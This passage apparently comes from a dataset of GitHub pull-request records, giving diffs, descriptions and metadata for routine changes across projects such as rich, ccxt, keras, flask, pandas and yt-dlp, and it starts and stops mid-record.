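    # for the next cache access to trigger expiration.
    while True:
        await asyncio.sleep(interval)
        cache.expire()

async def main() -> None:
    cache: TTLCache = TTLCache(maxsize=128, ttl=1.0)
    sweeper = asyncio.create_task(sweep(cache, interval=0.5))
    cache["session-id"] = "session info"
    await asyncio.sleep(2)            # longer than the TTL
    print("session-id" in cache)      # False: the sweeper already evicted it
    sweeper.cancel()

asyncio.run(main())
```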
https://api.github.com/repos/streamlit/streamlit/pulls/8083
2024-02-05T21:16:48Z
2024-02-07T23:42:07Z
2024-02-07T23:42:07Z
2024-02-07T23:42:11Z
1,661
streamlit/streamlit
21,993
[docs] Fix typos and other small stuff
diff --git a/docs/source/progress.rst b/docs/source/progress.rst index 23693843b..272687d93 100644 --- a/docs/source/progress.rst +++ b/docs/source/progress.rst @@ -58,7 +58,7 @@ The ``total`` value associated with a task is the number of steps that must be c Updating tasks ~~~~~~~~~~~~~~ -When you call :meth:`~rich.progress.Progress.add_task` you get back a `Task ID`. Use this ID to call :meth:`~rich.progress.Progress.update` whenever you have completed some work, or any information has changed. Typically you will need to update ``completed`` every time you have completed a step. You can do this by updated ``completed`` directly or by setting ``advance`` which will add to the current ``completed`` value. +When you call :meth:`~rich.progress.Progress.add_task` you get back a `Task ID`. Use this ID to call :meth:`~rich.progress.Progress.update` whenever you have completed some work, or any information has changed. Typically you will need to update ``completed`` every time you have completed a step. You can do this by setting ``completed`` directly or by setting ``advance`` which will add to the current ``completed`` value. The :meth:`~rich.progress.Progress.update` method collects keyword arguments which are also associated with the task. Use this to supply any additional information you would like to render in the progress display. The additional arguments are stored in ``task.fields`` and may be referenced in :ref:`Column classes<Columns>`. @@ -234,7 +234,7 @@ Here's an example that reads a url from the internet:: If you expect to be reading from multiple files, you can use :meth:`~rich.progress.Progress.open` or :meth:`~rich.progress.Progress.wrap_file` to add a file progress to an existing Progress instance. -See `cp_progress.py <https://github.com/willmcgugan/rich/blob/master/examples/cp_progress.py>` for a minimal clone of the ``cp`` command which shows a progress bar as the file is copied. +See `cp_progress.py <https://github.com/willmcgugan/rich/blob/master/examples/cp_progress.py>`_ for a minimal clone of the ``cp`` command which shows a progress bar as the file is copied. Multiple Progress diff --git a/docs/source/tables.rst b/docs/source/tables.rst index fdc6ec043..f573dbc62 100644 --- a/docs/source/tables.rst +++ b/docs/source/tables.rst @@ -50,13 +50,13 @@ Table Options There are a number of keyword arguments on the Table constructor you can use to define how a table should look. -- ``title`` Sets the title of the table (text show above the table). -- ``caption`` Sets the table caption (text show below the table). +- ``title`` Sets the title of the table (text shown above the table). +- ``caption`` Sets the table caption (text shown below the table). - ``width`` Sets the desired width of the table (disables automatic width calculation). - ``min_width`` Sets a minimum width for the table. - ``box`` Sets one of the :ref:`appendix_box` styles for the table grid, or ``None`` for no grid. - ``safe_box`` Set to ``True`` to force the table to generate ASCII characters rather than unicode. -- ``padding`` An integer, or tuple of 1, 2, or 4 values to set the padding on cells. +- ``padding`` An integer, or tuple of 1, 2, or 4 values to set the padding on cells (see :ref:`Padding`). - ``collapse_padding`` If True the padding of neighboring cells will be merged. - ``pad_edge`` Set to False to remove padding around the edge of the table. - ``expand`` Set to True to expand the table to the full available size. 
diff --git a/docs/source/text.rst b/docs/source/text.rst index fd6851fb4..c5a1add82 100644 --- a/docs/source/text.rst +++ b/docs/source/text.rst @@ -28,12 +28,12 @@ Alternatively, you can construct styled text by calling :meth:`~rich.text.Text.a If you would like to use text that is already formatted with ANSI codes, call :meth:`~rich.text.Text.from_ansi` to convert it to a ``Text`` object:: - text = Text.from_ansi("\033[1mHello, World!\033[0m") + text = Text.from_ansi("\033[1;35mHello\033[0m, World!") console.print(text.spans) -Since building Text instances from parts is a common requirement, Rich offers :meth:`~rich.text.Text.assemble` which will combine strings or pairs of string and Style, and return a Text instance. The follow example is equivalent to the code above:: +Since building Text instances from parts is a common requirement, Rich offers :meth:`~rich.text.Text.assemble` which will combine strings or pairs of string and Style, and return a Text instance. The following example is equivalent to the ANSI example above:: - text = Text.assemble(("Hello", "bold magenta"), " World!") + text = Text.assemble(("Hello", "bold magenta"), ", World!") console.print(text) You can apply a style to given words in the text with :meth:`~rich.text.Text.highlight_words` or for ultimate control call :meth:`~rich.text.Text.highlight_regex` to highlight text matching a *regular expression*. diff --git a/rich/pretty.py b/rich/pretty.py index 498907f4c..5c48cfd9f 100644 --- a/rich/pretty.py +++ b/rich/pretty.py @@ -986,7 +986,7 @@ class StockKeepingUnit(NamedTuple): from rich import print - # print(Pretty(data, indent_guides=True, max_string=20)) + print(Pretty(data, indent_guides=True, max_string=20)) class Thing: def __repr__(self) -> str:
## Type of changes - [ ] Bug fix - [ ] New feature - [x] Documentation / docstrings - [ ] Tests - [ ] Other ## Checklist - [ ] I've run the latest [black](https://github.com/psf/black) with default args on new code. - [ ] I've updated CHANGELOG.md and CONTRIBUTORS.md where appropriate. - [ ] I've added tests for new code. - [x] I accept that @willmcgugan may be pedantic in the code review. ## Description Just some minor mistakes I found while reading the (otherwise excellent!) docs.
https://api.github.com/repos/Textualize/rich/pulls/3094
2023-08-19T18:03:08Z
2023-11-07T17:37:25Z
2023-11-07T17:37:25Z
2024-01-24T13:45:32Z
1,329
Textualize/rich
48,631
Add more transpile funcs
diff --git a/build/transpile.js b/build/transpile.js index ca21d24bfd75..f34011c62a11 100644 --- a/build/transpile.js +++ b/build/transpile.js @@ -68,6 +68,8 @@ const commonRegexes = [ [ /\.parseTrades\s/g, '.parse_trades'], [ /\.parseTrade\s/g, '.parse_trade'], [ /\.parseTradingViewOHLCV\s/g, '.parse_trading_view_ohlcv'], + [ /\.parseTransaction\s/g, '.parse_transaction'], + [ /\.parseTransactions\s/g, '.parse_transactions'], [ /\.parseOrderBook\s/g, '.parse_order_book'], [ /\.parseBidsAsks\s/g, '.parse_bids_asks'], [ /\.parseBidAsk\s/g, '.parse_bid_ask'], @@ -114,6 +116,7 @@ const commonRegexes = [ [ /\.currencyToPrecision\s/g, '.currency_to_precision'], [ /\.costToPrecision\s/g, '.cost_to_precision'], [ /\.commonCurrencyCode\s/g, '.common_currency_code'], + [ /\.loadAccounts\s/g, '.load_accounts'], [ /\.loadFees\s/g, '.load_fees'], [ /\.loadMarkets\s/g, '.load_markets'], [ /\.fetchMarkets\s/g, '.fetch_markets'],
While looking at the Python implementations for these, I got confused because these functions aren't transpiled. Feel free to disregard it, but it can make things clearer.
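To illustrate what the added mappings do, here is a rough Python re-creation of one transpile step (simplified and hypothetical; the real build script in transpile.js applies a long list of such regex pairs to the JS sources):

```python
import re

# Simplified re-creation of the camelCase -> snake_case rewrites added above.
RULES = [
    (re.compile(r"\.parseTransactions\s"), ".parse_transactions "),
    (re.compile(r"\.parseTransaction\s"), ".parse_transaction "),
    (re.compile(r"\.loadAccounts\s"), ".load_accounts "),
]

js_line = "const accounts = await this.loadAccounts ();"
py_line = js_line
for pattern, replacement in RULES:
    py_line = pattern.sub(replacement, py_line)

print(py_line)  # const accounts = await this.load_accounts ();
```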
https://api.github.com/repos/ccxt/ccxt/pulls/5920
2019-10-04T16:20:06Z
2019-10-04T20:25:32Z
2019-10-04T20:25:32Z
2019-11-13T12:44:14Z
296
ccxt/ccxt
12,996
Should subsample Convolution1D on correct axis
diff --git a/keras/layers/convolutional.py b/keras/layers/convolutional.py index 3c3c58ea643..264314d1b95 100644 --- a/keras/layers/convolutional.py +++ b/keras/layers/convolutional.py @@ -30,7 +30,7 @@ def __init__(self, input_dim, nb_filter, filter_length, self.subsample_length = subsample_length self.init = initializations.get(init) self.activation = activations.get(activation) - self.subsample = (1, subsample_length) + self.subsample = (subsample_length, 1) self.border_mode = border_mode self.input = T.tensor3()
https://api.github.com/repos/keras-team/keras/pulls/706
2015-09-21T04:01:01Z
2015-10-03T19:07:06Z
2015-10-03T19:07:06Z
2015-10-03T19:07:06Z
169
keras-team/keras
47,043
Update accelerate requirement from ==0.24.* to ==0.25.*
diff --git a/requirements.txt b/requirements.txt index 3d25bfd770..51385e1125 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,4 +1,4 @@ -accelerate==0.24.* +accelerate==0.25.* colorama datasets einops diff --git a/requirements_amd.txt b/requirements_amd.txt index e27f3016e2..4299faa9f9 100644 --- a/requirements_amd.txt +++ b/requirements_amd.txt @@ -1,4 +1,4 @@ -accelerate==0.24.* +accelerate==0.25.* colorama datasets einops diff --git a/requirements_amd_noavx2.txt b/requirements_amd_noavx2.txt index f78832e3f3..60f57b0d04 100644 --- a/requirements_amd_noavx2.txt +++ b/requirements_amd_noavx2.txt @@ -1,4 +1,4 @@ -accelerate==0.24.* +accelerate==0.25.* colorama datasets einops diff --git a/requirements_apple_intel.txt b/requirements_apple_intel.txt index febb0609e6..9ab018292f 100644 --- a/requirements_apple_intel.txt +++ b/requirements_apple_intel.txt @@ -1,4 +1,4 @@ -accelerate==0.24.* +accelerate==0.25.* colorama datasets einops diff --git a/requirements_apple_silicon.txt b/requirements_apple_silicon.txt index 2997c98f32..7cc674bb48 100644 --- a/requirements_apple_silicon.txt +++ b/requirements_apple_silicon.txt @@ -1,4 +1,4 @@ -accelerate==0.24.* +accelerate==0.25.* colorama datasets einops diff --git a/requirements_cpu_only.txt b/requirements_cpu_only.txt index ec0e84ffd0..6eb1d7ba59 100644 --- a/requirements_cpu_only.txt +++ b/requirements_cpu_only.txt @@ -1,4 +1,4 @@ -accelerate==0.24.* +accelerate==0.25.* colorama datasets einops diff --git a/requirements_cpu_only_noavx2.txt b/requirements_cpu_only_noavx2.txt index 02e51844e6..d415370eaa 100644 --- a/requirements_cpu_only_noavx2.txt +++ b/requirements_cpu_only_noavx2.txt @@ -1,4 +1,4 @@ -accelerate==0.24.* +accelerate==0.25.* colorama datasets einops diff --git a/requirements_noavx2.txt b/requirements_noavx2.txt index eeff8eb71d..38d1569b20 100644 --- a/requirements_noavx2.txt +++ b/requirements_noavx2.txt @@ -1,4 +1,4 @@ -accelerate==0.24.* +accelerate==0.25.* colorama datasets einops diff --git a/requirements_nowheels.txt b/requirements_nowheels.txt index d08204fd1c..80a6b65d07 100644 --- a/requirements_nowheels.txt +++ b/requirements_nowheels.txt @@ -1,4 +1,4 @@ -accelerate==0.24.* +accelerate==0.25.* colorama datasets einops
Updates the requirements on [accelerate](https://github.com/huggingface/accelerate) to permit the latest version. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/huggingface/accelerate/releases">accelerate's releases</a>.</em></p> <blockquote> <h2>v0.25.0: safetensors by default, new trackers, and plenty of bug fixes</h2> <h2>Safetensors default</h2> <p>As of this release, <code>safetensors</code> will be the default format saved when applicable! To read more about safetensors and why it's best to use it for safety (and not pickle/torch.save), check it out <a href="https://github.com/huggingface/safetensors">here</a></p> <h2>New Experiment Trackers</h2> <p>This release has two new experiment trackers, ClearML and DVCLive!</p> <p>To use them, just pass <code>clear_ml</code> or <code>dvclive</code> to <code>log_with</code> in the <code>Accelerator</code> init. h/t to <a href="https://github.com/eugen-ajechiloae-clearml"><code>@​eugen-ajechiloae-clearml</code></a> and <a href="https://github.com/dberenbaum"><code>@​dberenbaum</code></a></p> <h2>DeepSpeed</h2> <ul> <li>Accelerate's DeepSpeed integration now supports NPU devices, h/t to <a href="https://github.com/statelesshz"><code>@​statelesshz</code></a></li> <li>DeepSpeed can now be launched via accelerate on single GPU setups</li> </ul> <h2>FSDP</h2> <p>FSDP had a huge refactoring so that the interface when using FSDP is the exact same as every other scenario when using <code>accelerate</code>. No more needing to call <code>accelerator.prepare()</code> twice!</p> <h2>Other useful enhancements</h2> <ul> <li> <p>We now raise and try to disable P2P communications on consumer GPUs for the 3090 series and beyond. Without this users were seeing timeout issues and the like as NVIDIA dropped P2P support. 
If using <code>accelerate launch</code> we will automatically disable, and if we sense that it is still enabled on distributed setups using 3090's +, we will raise an error.</p> </li> <li> <p>When doing <code>.gather()</code>, if tensors are on different devices we explicitly will raise an error (for now only valid on CUDA)</p> </li> </ul> <h2>Bug fixes</h2> <ul> <li>Fixed a bug that caused dataloaders to not shuffle despite <code>shuffle=True</code> when using multiple GPUs and the new <code>SeedableRandomSampler</code>.</li> </ul> <h2>General Changelog</h2> <ul> <li>Add logs offloading by <a href="https://github.com/SunMarc"><code>@​SunMarc</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2075">huggingface/accelerate#2075</a></li> <li>Add ClearML tracker by <a href="https://github.com/eugen-ajechiloae-clearml"><code>@​eugen-ajechiloae-clearml</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2034">huggingface/accelerate#2034</a></li> <li>CRITICAL: fix failing ci by <a href="https://github.com/muellerzr"><code>@​muellerzr</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2088">huggingface/accelerate#2088</a></li> <li>Fix flag typo by <a href="https://github.com/kuza55"><code>@​kuza55</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2090">huggingface/accelerate#2090</a></li> <li>Fix batch sampler by <a href="https://github.com/muellerzr"><code>@​muellerzr</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2097">huggingface/accelerate#2097</a></li> <li>fixed ip address typo by <a href="https://github.com/Fluder-Paradyne"><code>@​Fluder-Paradyne</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2099">huggingface/accelerate#2099</a></li> <li>Fix memory leak in fp8 causing OOM (and potentially 3x vRAM usage) by <a href="https://github.com/muellerzr"><code>@​muellerzr</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2089">huggingface/accelerate#2089</a></li> <li>fix warning when offload by <a href="https://github.com/SunMarc"><code>@​SunMarc</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2105">huggingface/accelerate#2105</a></li> <li>Always use SeedableRandomSampler by <a href="https://github.com/muellerzr"><code>@​muellerzr</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2110">huggingface/accelerate#2110</a></li> <li>Fix issue with tests by <a href="https://github.com/muellerzr"><code>@​muellerzr</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2111">huggingface/accelerate#2111</a></li> <li>Make SeedableRandomSampler the default always by <a href="https://github.com/muellerzr"><code>@​muellerzr</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2117">huggingface/accelerate#2117</a></li> <li>Use &quot;and&quot; instead of comma in Bibtex citation by <a href="https://github.com/qgallouedec"><code>@​qgallouedec</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2119">huggingface/accelerate#2119</a></li> <li>Add explicit error if empty batch received by <a href="https://github.com/YuryYakhno"><code>@​YuryYakhno</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2115">huggingface/accelerate#2115</a></li> <li>Allow for ACCELERATE_SEED env var by <a href="https://github.com/muellerzr"><code>@​muellerzr</code></a> in <a 
href="https://redirect.github.com/huggingface/accelerate/pull/2126">huggingface/accelerate#2126</a></li> <li>add DeepSpeed support for NPU by <a href="https://github.com/statelesshz"><code>@​statelesshz</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2054">huggingface/accelerate#2054</a></li> <li>Sync states for npu fsdp by <a href="https://github.com/jq460494839"><code>@​jq460494839</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2113">huggingface/accelerate#2113</a></li> <li>Fix import error when torch&gt;=2.0.1 and torch.distributed is disabled by <a href="https://github.com/natsukium"><code>@​natsukium</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2121">huggingface/accelerate#2121</a></li> <li>Make safetensors the default by <a href="https://github.com/muellerzr"><code>@​muellerzr</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2120">huggingface/accelerate#2120</a></li> <li>Raise error when saving with param on meta device by <a href="https://github.com/SunMarc"><code>@​SunMarc</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2132">huggingface/accelerate#2132</a></li> </ul> <!-- raw HTML omitted --> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Commits</summary> <ul> <li><a href="https://github.com/huggingface/accelerate/commit/d08c23c20975f39393b431143237c193733e7bb8"><code>d08c23c</code></a> Release: v0.25.0</li> <li><a href="https://github.com/huggingface/accelerate/commit/0e48b2358deeb309ff2583884aa46c71c38dcca2"><code>0e48b23</code></a> allow deepspeed without distributed launcher (<a href="https://redirect.github.com/huggingface/accelerate/issues/2204">#2204</a>)</li> <li><a href="https://github.com/huggingface/accelerate/commit/3499cf25aa431ed3eeb7969f1d9b501ef20d0911"><code>3499cf2</code></a> Assemble state dictionary for offloaded models (<a href="https://redirect.github.com/huggingface/accelerate/issues/2156">#2156</a>)</li> <li><a href="https://github.com/huggingface/accelerate/commit/68d63ee15f0faf12429d686b7eca3ee0afb1760d"><code>68d63ee</code></a> unpins dvc (<a href="https://redirect.github.com/huggingface/accelerate/issues/2200">#2200</a>)</li> <li><a href="https://github.com/huggingface/accelerate/commit/151637920d04b1b7aca51b805ec8f3811fffff4c"><code>1516379</code></a> Better error when device mismatches when calling gather() on CUDA (<a href="https://redirect.github.com/huggingface/accelerate/issues/2180">#2180</a>)</li> <li><a href="https://github.com/huggingface/accelerate/commit/0ba3e9bb50589acc35aadc4db792e617070bdd01"><code>0ba3e9b</code></a> Explicitly disable P2P using <code>launch</code>, and pick up in <code>state</code> if a user will ...</li> <li><a href="https://github.com/huggingface/accelerate/commit/b04d36c75f701266048382426b4074e28bfdb67c"><code>b04d36c</code></a> Apply DVC warning to Accelerate (<a href="https://redirect.github.com/huggingface/accelerate/issues/2197">#2197</a>)</li> <li><a href="https://github.com/huggingface/accelerate/commit/5fc1b230d339c6e77179adfe2b74a6b414c9cbbf"><code>5fc1b23</code></a> Pin DVC (<a href="https://redirect.github.com/huggingface/accelerate/issues/2196">#2196</a>)</li> <li><a href="https://github.com/huggingface/accelerate/commit/244122c736141b164242084c659b6dafa4208fea"><code>244122c</code></a> fsdp refactoring (<a href="https://redirect.github.com/huggingface/accelerate/issues/2177">#2177</a>)</li> <li><a 
href="https://github.com/huggingface/accelerate/commit/d25efa71ce76a5f5911a1fc6c039979d7248596f"><code>d25efa7</code></a> Don't install comet</li> <li>Additional commits viewable in <a href="https://github.com/huggingface/accelerate/compare/v0.24...v0.25.0">compare view</a></li> </ul> </details> <br /> Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`. [//]: # (dependabot-automerge-start) [//]: # (dependabot-automerge-end) --- <details> <summary>Dependabot commands and options</summary> <br /> You can trigger Dependabot actions by commenting on this PR: - `@dependabot rebase` will rebase this PR - `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it - `@dependabot merge` will merge this PR after your CI passes on it - `@dependabot squash and merge` will squash and merge this PR after your CI passes on it - `@dependabot cancel merge` will cancel a previously requested merge and block automerging - `@dependabot reopen` will reopen this PR if it is closed - `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually - `@dependabot show <dependency name> ignore conditions` will show all of the ignore conditions of the specified dependency - `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself) - `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself) - `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) </details>
https://api.github.com/repos/oobabooga/text-generation-webui/pulls/4810
2023-12-04T20:57:30Z
2023-12-04T23:36:01Z
2023-12-04T23:36:01Z
2023-12-04T23:36:11Z
813
oobabooga/text-generation-webui
26,109
cache_timeout should be always checked not Null
diff --git a/flask/helpers.py b/flask/helpers.py index 72a961a827..18502a53f0 100644 --- a/flask/helpers.py +++ b/flask/helpers.py @@ -533,7 +533,7 @@ def send_file(filename_or_fp, mimetype=None, as_attachment=False, rv.cache_control.public = True if cache_timeout is None: cache_timeout = current_app.get_send_file_max_age(filename) - if cache_timeout: + if cache_timeout is not None: rv.cache_control.max_age = cache_timeout rv.expires = int(time() + cache_timeout)
I think send_file should always check that cache_timeout is not None, to allow for an (I hope legal) value of 0 for that parameter.
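A tiny sketch of the truthiness pitfall the patch fixes (illustrative only, not Flask code):

```python
cache_timeout = 0  # a legal "do not cache" value

if cache_timeout:                # old check: 0 is falsy, so the branch is skipped
    print("old check sets max_age =", cache_timeout)

if cache_timeout is not None:    # new check: 0 is handled explicitly
    print("new check sets max_age =", cache_timeout)   # prints 0
```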
https://api.github.com/repos/pallets/flask/pulls/527
2012-06-13T13:44:31Z
2012-06-17T12:56:02Z
2012-06-17T12:56:02Z
2020-11-14T05:52:48Z
136
pallets/flask
20,715
ENH/API: Keep original traceback in DataFrame.apply
diff --git a/doc/source/release.rst b/doc/source/release.rst index bb82a055dcd8d..8fba8618fd860 100644 --- a/doc/source/release.rst +++ b/doc/source/release.rst @@ -262,6 +262,8 @@ See :ref:`Internal Refactoring<whatsnew_0130.refactoring>` if code argument out of range (:issue:`4519`, :issue:`4520`) - Fix reindexing with multiple axes; if an axes match was not replacing the current axes, leading to a possible lazay frequency inference issue (:issue:`3317`) + - Fixed issue where ``DataFrame.apply`` was reraising exceptions incorrectly + (causing the original stack trace to be truncated). pandas 0.12 =========== diff --git a/pandas/core/frame.py b/pandas/core/frame.py index d032bbf66f95e..413cb0b6ef3d0 100644 --- a/pandas/core/frame.py +++ b/pandas/core/frame.py @@ -3632,7 +3632,7 @@ def _apply_standard(self, func, axis, ignore_failures=False, reduce=True): except (NameError, UnboundLocalError): # pragma: no cover # no k defined yet pass - raise e + raise if len(results) > 0 and _is_sequence(results[0]): if not isinstance(results[0], Series):
When "raise <exception instance>" is used inside a try/except block, the original stacktrace (containing the code path that raised the original exception) is lost. This makes debugging difficult since all we know is that an error occurred when `frame._apply_standard` attempted to call the provided function. Preserve the original stacktrace by using "raise" instead of "raise <exception instance>". This facilitates debugging by allowing us to see where (in the provided callable) the exception occurred.
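A small illustration of the difference (not pandas code; the traceback-truncating behaviour of `raise e` is most pronounced on Python 2, which this 2013 change targets, and a bare `raise` is the idiomatic re-raise either way):

```python
import traceback

def user_func(x):
    return x / 0                  # the frame we actually want to see when debugging

def apply_bare_raise(func):
    try:
        func(1)
    except Exception:
        raise                     # bare re-raise: the original traceback is kept

def apply_reraise_instance(func):
    try:
        func(1)
    except Exception as e:
        raise e                   # on Python 2 the traceback restarts at this line

try:
    apply_bare_raise(user_func)
except ZeroDivisionError:
    traceback.print_exc()         # includes the "return x / 0" frame inside user_func
```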
https://api.github.com/repos/pandas-dev/pandas/pulls/4549
2013-08-13T12:49:27Z
2013-08-21T13:42:36Z
2013-08-21T13:42:36Z
2014-06-19T20:26:24Z
325
pandas-dev/pandas
44,991
docs(readme): fix typo
diff --git a/README.md b/README.md index d2883dd04..004418a21 100644 --- a/README.md +++ b/README.md @@ -75,7 +75,7 @@ To contribute to diagram, check out [contribution guidelines](CONTRIBUTING.md). [GitPitch](https://gitpitch.github.io/gitpitch) is the perfect slide deck solution for Tech Conferences, Training, Developer Advocates, and Educators. Diagrams is now available as a dedicated [Cloud Diagram Markdown Widget](https://docs.gitpitch.com/#/diagrams/cloud-architecture) so you can use Diagrams directly on any slide for conferences, meetups, and training. -[Cloudiscovery](https://github.com/Cloud-Architects/cloudiscovery) helps you to analyze resources in your cloud (AWS/GCP/Azure/Alibaba/IBM) account. It allows you to create a diagram of analyzed cloud resource map based on this Diagrams library, so you can draw the your existing cloud infrastructure with Cloudicovery. +[Cloudiscovery](https://github.com/Cloud-Architects/cloudiscovery) helps you to analyze resources in your cloud (AWS/GCP/Azure/Alibaba/IBM) account. It allows you to create a diagram of analyzed cloud resource map based on this Diagrams library, so you can draw your existing cloud infrastructure with Cloudiscovery. [Airflow Diagrams](https://github.com/feluelle/airflow-diagrams) is an Airflow plugin that aims to easily visualise your Airflow DAGs on service level from providers like AWS, GCP, Azure, etc. via diagrams.
https://api.github.com/repos/mingrammer/diagrams/pulls/496
2021-03-28T07:35:08Z
2021-05-03T14:56:01Z
2021-05-03T14:56:01Z
2021-05-03T14:56:01Z
353
mingrammer/diagrams
52,670
bibox fetchOpenOrders allow wildcard symbol
diff --git a/js/bibox.js b/js/bibox.js index f650a8034332..7a49b19e9a10 100644 --- a/js/bibox.js +++ b/js/bibox.js @@ -3,7 +3,7 @@ // --------------------------------------------------------------------------- const Exchange = require ('./base/Exchange'); -const { ExchangeError, AuthenticationError, DDoSProtection, InvalidOrder } = require ('./base/errors'); +const { ExchangeError, AuthenticationError, DDoSProtection, ExchangeNotAvailable, InvalidOrder } = require ('./base/errors'); // --------------------------------------------------------------------------- @@ -409,7 +409,7 @@ module.exports = class bibox extends Exchange { 'side': side, 'price': price, 'amount': amount, - 'cost': cost ? cost : price * filled, + 'cost': cost ? cost : parseFloat (price) * filled, 'filled': filled, 'remaining': remaining, 'status': status, @@ -432,15 +432,18 @@ module.exports = class bibox extends Exchange { } async fetchOpenOrders (symbol = undefined, since = undefined, limit = undefined, params = {}) { - if (typeof symbol === 'undefined') - throw new ExchangeError (this.id + ' fetchOpenOrders requires a symbol argument'); - await this.loadMarkets (); - let market = this.market (symbol); + let market = undefined; + let pair = undefined; + if (typeof symbol !== 'undefined') { + await this.loadMarkets (); + market = this.market (symbol); + pair = market['id']; + } let size = (limit) ? limit : 200; let response = await this.privatePostOrderpending ({ 'cmd': 'orderpending/orderPendingList', 'body': this.extend ({ - 'pair': market['id'], + 'pair': pair, 'account_type': 0, // 0 - regular, 1 - margin 'page': 1, 'size': size, @@ -565,6 +568,10 @@ module.exports = class bibox extends Exchange { throw new AuthenticationError (message); // invalid api key else if (code === '3025') throw new AuthenticationError (message); // signature failed + else if (code === '4000') + // \u5f53\u524d\u7f51\u7edc\u8fde\u63a5\u4e0d\u7a33\u5b9a\uff0c\u8bf7\u7a0d\u5019\u91cd\u8bd5 + // The current network connection is unstable. Please try again later + throw new ExchangeNotAvailable (message); else if (code === '4003') throw new DDoSProtection (message); // server is busy, try again later } diff --git a/js/kucoin.js b/js/kucoin.js index 5c6e3a5abea3..75eabebad650 100644 --- a/js/kucoin.js +++ b/js/kucoin.js @@ -96,6 +96,7 @@ module.exports = class kucoin extends Exchange { 'post': [ 'account/{coin}/withdraw/apply', 'account/{coin}/withdraw/cancel', + 'account/promotion/draw', 'cancel-order', 'order', 'order/cancel-all',
https://api.github.com/repos/ccxt/ccxt/pulls/1866
2018-02-11T01:11:56Z
2018-02-11T18:59:28Z
2018-02-11T18:59:28Z
2018-02-11T18:59:28Z
758
ccxt/ccxt
13,113
Add API-FOOTBALL
diff --git a/README.md b/README.md index 934004ae8a..39d24a513f 100644 --- a/README.md +++ b/README.md @@ -1152,6 +1152,7 @@ API | Description | Auth | HTTPS | CORS | ### Sports & Fitness API | Description | Auth | HTTPS | CORS | |---|---|---|---|---| +| [API-FOOTBALL](https://www.api-football.com/documentation-v3) | Get information about Football Leagues & Cups | `apiKey` | Yes | Yes | | [ApiMedic](https://apimedic.com/) | ApiMedic offers a medical symptom checker API primarily for patients | `apiKey` | Yes | Unknown | | [balldontlie](https://balldontlie.io) | Balldontlie provides access to stats data from the NBA | No | Yes | Yes | | [Canadian Football League (CFL)](http://api.cfl.ca/) | Official JSON API providing real-time league, team and player statistics about the CFL | `apiKey` | Yes | No |
#2107 <!-- Thank you for taking the time to work on a Pull Request for this project! --> <!-- To ensure your PR is dealt with swiftly please check the following: --> - [x] My submission is formatted according to the guidelines in the [contributing guide](/CONTRIBUTING.md) - [x] My addition is ordered alphabetically - [x] My submission has a useful description - [x] The description does not have more than 100 characters - [x] The description does not end with punctuation - [x] Each table column is padded with one space on either side - [x] I have searched the repository for any relevant issues or pull requests - [x] Any category I am creating has the minimum requirement of 3 items - [x] All changes have been [squashed][squash-link] into a single commit [squash-link]: <https://github.com/todotxt/todo.txt-android/wiki/Squash-All-Commits-Related-to-a-Single-Issue-into-a-Single-Commit>
https://api.github.com/repos/public-apis/public-apis/pulls/2414
2021-10-09T01:22:37Z
2021-10-19T15:03:00Z
2021-10-19T15:02:59Z
2021-10-19T15:03:00Z
240
public-apis/public-apis
35,281
[livestreamfails] Add new extractor
diff --git a/yt_dlp/extractor/_extractors.py b/yt_dlp/extractor/_extractors.py index 37328dfc840..4e3b2ead04e 100644 --- a/yt_dlp/extractor/_extractors.py +++ b/yt_dlp/extractor/_extractors.py @@ -837,6 +837,7 @@ LivestreamOriginalIE, LivestreamShortenerIE, ) +from .livestreamfails import LivestreamfailsIE from .lnkgo import ( LnkGoIE, LnkIE, diff --git a/yt_dlp/extractor/livestreamfails.py b/yt_dlp/extractor/livestreamfails.py new file mode 100644 index 00000000000..d6f626a99c9 --- /dev/null +++ b/yt_dlp/extractor/livestreamfails.py @@ -0,0 +1,34 @@ +from .common import InfoExtractor +from ..utils import format_field, traverse_obj, unified_timestamp + + +class LivestreamfailsIE(InfoExtractor): + _VALID_URL = r'https?://(?:www\.)?livestreamfails\.com/clip/(?P<id>[0-9]+)' + _TESTS = [{ + 'url': 'https://livestreamfails.com/clip/139200', + 'md5': '8a03aea1a46e94a05af6410337463102', + 'info_dict': { + 'id': '139200', + 'ext': 'mp4', + 'display_id': 'ConcernedLitigiousSalmonPeteZaroll-O8yo9W2L8OZEKhV2', + 'title': 'Streamer jumps off a trampoline at full speed', + 'creator': 'paradeev1ch', + 'thumbnail': r're:^https?://.+', + 'timestamp': 1656271785, + 'upload_date': '20220626', + } + }] + + def _real_extract(self, url): + video_id = self._match_id(url) + api_response = self._download_json(f'https://api.livestreamfails.com/clip/{video_id}', video_id) + + return { + 'id': video_id, + 'display_id': api_response.get('sourceId'), + 'timestamp': unified_timestamp(api_response.get('createdAt')), + 'url': f'https://livestreamfails-video-prod.b-cdn.net/video/{api_response["videoId"]}', + 'title': api_response.get('label'), + 'creator': 